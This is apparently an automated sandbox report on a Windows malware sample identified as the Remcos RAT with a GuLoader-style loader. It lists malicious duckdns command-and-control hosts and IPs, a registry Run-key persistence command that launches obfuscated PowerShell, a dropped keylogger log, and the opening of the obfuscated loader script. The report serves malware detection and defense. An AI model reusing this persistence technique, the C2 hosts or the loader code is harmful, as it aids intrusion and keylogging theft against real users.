          geoplugin.net
          178.237.33.50
          truefalse
            high
            drive.google.com
            172.217.215.102
            truefalse
              high
              drive.usercontent.google.com
              108.177.122.132
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                  high
                  eweo9264gtuiorta1.duckdns.orgtrue
                  • Avira URL Cloud: safe
                  unknown
                  eweo9264gtuiort.duckdns.orgtrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://drive.google.com/?msiexec.exe, 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000836000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://www.google.commsiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://geoplugin.net/json.gplBsmsiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://geoplugin.net/json.gpoAJmsiexec.exe, 00000003.00000003.3201211577.0000000024AA5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3201184446.0000000024AA4000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://drive.google.com/msiexec.exe, 00000003.00000002.5248319710.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://drive.usercontent.google.com/(Rmsiexec.exe, 00000003.00000002.5248447149.000000000080D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://geoplugin.net/json.gpxeFpmsiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.google.com/-449a-bb32-9d4a700c395bmsiexec.exe, 00000003.00000003.4145873580.0000000000828000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.usercontent.google.com/Hxmsiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.quovadis.bm0msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://drive.usercontent.google.com/msiexec.exe, 00000003.00000002.5248447149.000000000080D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://apis.google.commsiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://nsis.sf.net/NSIS_ErrorErrorx295IO8kqM.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ocsp.quovadisoffshore.com0msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://drive.google.com/gmsiexec.exe, 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000836000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://geoplugin.net/json.gpqsmsiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.217.215.102
                                              drive.google.comUnited States
                                              15169GOOGLEUSfalse
                                              108.177.122.132
                                              drive.usercontent.google.comUnited States
                                              15169GOOGLEUSfalse
                                              172.111.244.113
                                              eweo9264gtuiorta1.duckdns.orgUnited States
                                              9009M247GBtrue
                                              178.237.33.50
                                              geoplugin.netNetherlands
                                              8455ATOM86-ASATOM86NLfalse
                                              192.169.69.26
                                              eweo9264gtuiort.duckdns.orgUnited States
                                              23033WOWUStrue
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1574342
                                              Start date and time:2024-12-13 08:48:07 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 11s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                              Number of analysed new started processes analysed:7
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:x295IO8kqM.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@11/17@5/5
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 45
                                              • Number of non-executed functions: 28
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: x295IO8kqM.exe
                                              TimeTypeDescription
                                              02:50:10API Interceptor41x Sleep call for process: powershell.exe modified
                                              02:51:18API Interceptor7509399x Sleep call for process: msiexec.exe modified
                                              08:50:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Feries %Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)
                                              08:50:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Feries %Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.111.244.113DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                178.237.33.507d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • geoplugin.net/json.gp
                                                greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                192.169.69.26f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                • duclog23.duckdns.org:37552/
                                                SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                • yuya0415.duckdns.org:1928/Vre
                                                confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                                • servidorarquivos.duckdns.org/e/e
                                                oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                                • yvtplhuqem.duckdns.org/ja/
                                                http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                • fqqqffcydg.duckdns.org/en/
                                                http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                • yugdzvsqnf.duckdns.org/en/
                                                &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                                • servidorarquivos.duckdns.org/e/e
                                                transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                                • servidorarquivos.duckdns.org/e/e
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                eweo9264gtuiorta1.duckdns.orgDOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 172.111.244.113
                                                eweo9264gtuiort.duckdns.org9FPFmh6r5t.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 45.66.231.104
                                                Document#.exeGet hashmaliciousRemcosBrowse
                                                • 45.89.247.84
                                                Document2.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 91.92.253.223
                                                2BP0Pl12C4.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 91.92.250.84
                                                D511A37B2F8D6746F1AC95137E6B62DB7A1FFA14E5287.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 46.183.220.203
                                                geoplugin.net7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 178.237.33.50
                                                greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                • 178.237.33.50
                                                SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                M247GBx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 45.9.249.72
                                                IObitLiveUpdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                • 37.10.71.240
                                                VY2PWnR8K5.exeGet hashmaliciousNanocore, XWormBrowse
                                                • 104.250.175.42
                                                zZ8OdFfZnb.exeGet hashmaliciousUnknownBrowse
                                                • 185.158.248.216
                                                dkarts.dll.dllGet hashmaliciousUnknownBrowse
                                                • 185.158.248.216
                                                DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 172.111.244.113
                                                SHIPPINGIN PL BT PDF.exeGet hashmaliciousRedLineBrowse
                                                • 77.90.185.55
                                                rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 185.94.197.166
                                                YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                • 185.100.157.28
                                                jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 213.109.189.177
                                                WOWUSzvXPSu3dK5.exeGet hashmaliciousAsyncRATBrowse
                                                • 192.169.69.26
                                                173398584769f9c5bcf28a71f77fba1335e77fe6b4cc4f05afc05fdd9f5830429be0bc9fb5758.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 192.169.69.26
                                                nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                • 192.169.69.26
                                                1733858044e64c59622ab494dda2ff98fce76991f7e15e513d6a3620e7f58ad7cc67d3889c571.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                • 192.169.69.26
                                                f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                • 192.169.69.26
                                                P0J8k3LhVV.exeGet hashmaliciousNanocoreBrowse
                                                • 192.169.69.26
                                                173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                • 192.169.69.26
                                                173349048648c854fdb460c6c7c5fd91e325ea882961d8aa5918c705b053bb8e9350ae27c8877.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                • 192.169.69.26
                                                17334905521d597933f8aaddb97573b46d117b288a865f8a218fac0e15588edac3edcab35b588.dat-decoded.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                • 192.169.69.26
                                                17334905555b1bb5616b6229d3e91468cd944baaeea0d1c904cc91a0fe89b683d653c3710f732.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                • 192.169.69.26
                                                ATOM86-ASATOM86NL7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                • 178.237.33.50
                                                greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                • 178.237.33.50
                                                SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                PO_11171111221.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                c2.htaGet hashmaliciousXWormBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                • 172.217.215.102
                                                • 108.177.122.132
                                                No context
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):232
                                                Entropy (8bit):3.440824925520913
                                                Encrypted:false
                                                SSDEEP:6:6lZNlHole55YcIeeDAlOWA7DxbN2fxlx5Mm0v:6l5Yehec0WItN2Lx5Ml
                                                MD5:F59F4C892F6A093A9B2380D10B20B033
                                                SHA1:2276D769130A8D2A61DA9F328F871BF18DB8E86B
                                                SHA-256:2381D8156A9DC518DFFA0A84F2D0EA9D89E00A99264395C06AB7C7EC0740545C
                                                SHA-512:1DFBE6333990212F4A5DC65CE58CDA3BDD1C866B9FE7B5CDF10371DF0ADB39F115AAA869C9082D7AE56CC89C3C211E8F8CAA768A42522553BA289FEC76073A54
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\aksloest.dat, Author: Joe Security
                                                Reputation:low
                                                Preview:....[.2.0.2.4./.1.2./.1.3. .0.2.:.5.0.:.4.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.1.4.1.2. .m.i.n.u.t.e.s. .}.....
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):962
                                                Entropy (8bit):5.00819003742181
                                                Encrypted:false
                                                SSDEEP:12:tkl/jond6CsGkMyGWKyGXPVGArwY3vJv+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkv:qlb4dRNuKyGX85WJ+vXhNlT3/7+GeWro
                                                MD5:AFF25EB004F80DFC3CAFE28617E0AE3E
                                                SHA1:C5F14301AF9F222668697EF791009508C3E64080
                                                SHA-256:CEF2F365472FAF304437B90B061A895D3C458E07CEE301EB0810C0E6085FE92B
                                                SHA-512:F3DB037CD6ABD62B35A24AA600B6842CAC20DBD0335E3DBAE6815C6CFDBE5CD2AE6433E4ABD2F611EFED5875147842EB33718C56A1F8BE562BE470A1DD474A4B
                                                Malicious:false
                                                Reputation:low
                                                Preview:{. "geoplugin_request":"89.187.171.165",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Atlanta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"33.7485",. "geoplugin_longitude":"-84.3871",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):14744
                                                Entropy (8bit):4.990428309401091
                                                Encrypted:false
                                                SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA
                                                MD5:A3F4A4CED5E4717EA59EEDAAA642F0CF
                                                SHA1:EB40B4929869C8C2A8866A0F06AE166F406FE493
                                                SHA-256:59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E
                                                SHA-512:804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):345318
                                                Entropy (8bit):1.2552815277581528
                                                Encrypted:false
                                                SSDEEP:768:R40G2RKf9t/qm9R6GVLqqtO3MwGKFR/LvYfF6BlpaFeiJTnn8rPOjVsO2rgqziIJ:TKN33+DU4iIhkBLaN4hbQA/teZ
                                                MD5:D631BA9F3FC2531BE1EB2F3456796E22
                                                SHA1:148DE71666FEAE61A980EBE145997C7A4AFE14BA
                                                SHA-256:7D262CC8D06EB8682B3E3F58C3EB37B33C8376AA7FE0B23A7A4D0F5BBEEDCE85
                                                SHA-512:A27825EFCB2A1EC077196173B6E694715847770D07F202714817DAD57541187347A10EE376161E088CBDD790F014F998301FED589BA898DAF53ECF102C773FD8
                                                Malicious:false
                                                Preview:..v.........................................................H.......................................S.........?...................................................................c........].................).......g...$.................................................m..........................P..........................................0.....u............. ...............d.......................................2.....r...T.......................................................................................+...p........................................................*..................k....\....O...............S..........................................=.......................................e...............................+.....................................q...........................!........`......l...................................c..........Q..................9......_........!..q.........................................}.........................................................
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:ASCII text, with very long lines (4279), with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):73222
                                                Entropy (8bit):5.196773964749615
                                                Encrypted:false
                                                SSDEEP:1536:Z3ayvkGAI/1VnqmuyXfl95Tx9PPM0Iwe0ArfP4lfvg2c:Z3ayMGAINVqmuAfl3Tx9c0tYn4hva
                                                MD5:6496B0F233D8E97B72FB1E7B8405ACB0
                                                SHA1:4D80619F2FABDBBCCC119F4EADD73732AC1E08D0
                                                SHA-256:EA6F13FC1E413210BC127214D93C9AD5745DADA6E4181E23086E1C03417D2250
                                                SHA-512:C3B75BD7333BEBD1A58765A329BDBF6E25062386C252D9594ACF2AB6157E1D8B33B5D9E2498A45D5DF553C41B8B937695947773F521A17A90D088F443C4E3FB8
                                                Malicious:false
                                                Preview:$Lseprve=$Prairieweed;..<#Sangerindes Kontorlokaler Admitteredes Guardstone Taxachauffr #>..<#Choreographs Emphlysis Tyranniers Dvrgvkster Unsectionalised #>..<#urimeligeres Prelicenses Ydmygste Paintroot trvegravens #>..<#Hemisfres Dhobey Turkologist Unsoot Indskrivningsarbejdernes Massakrerede Flamingoen #>..<#Vl Bilirubinemia Pladsholderfelts Nonsynoptical Retears flertrinsrakets #>..<#Afskrivningsvelsens unelevated Illiberality Timist Affej Reobjectivize #>...$Nunnify = @'.afstraf.Bygrnse$Kod kisUS,onslunRudev,scFornjelhForfrdeaBuegangnSanseapgFartesseIdon alaBravesobThriverlIntercey profit=Concord$Vavas rKCardionnTantiemoKulbuelsregretfpBloodmoa Ste.fal subt,rdOplodrehPraedike AnaphyaImanueldRombepo; Proton.El,tistfEnk ltpuDardskinGdskendcLukewart Hipomai Mat looUnseismnUnvital B.oodnoDMensegreHoc eyspRenskrioExecutisGruppeti ulpunktOo,phsduMazef,lm Trlsoms FeltspbUn avoreX,vclunvFangebui DisaugsKaliumke SuppesrBusgadesBesttel1futuris3 Serial8 Antice Aakirke( Pterid$Akseltrf Korp,
                                                Process:C:\Users\user\Desktop\x295IO8kqM.exe
                                                File Type:data
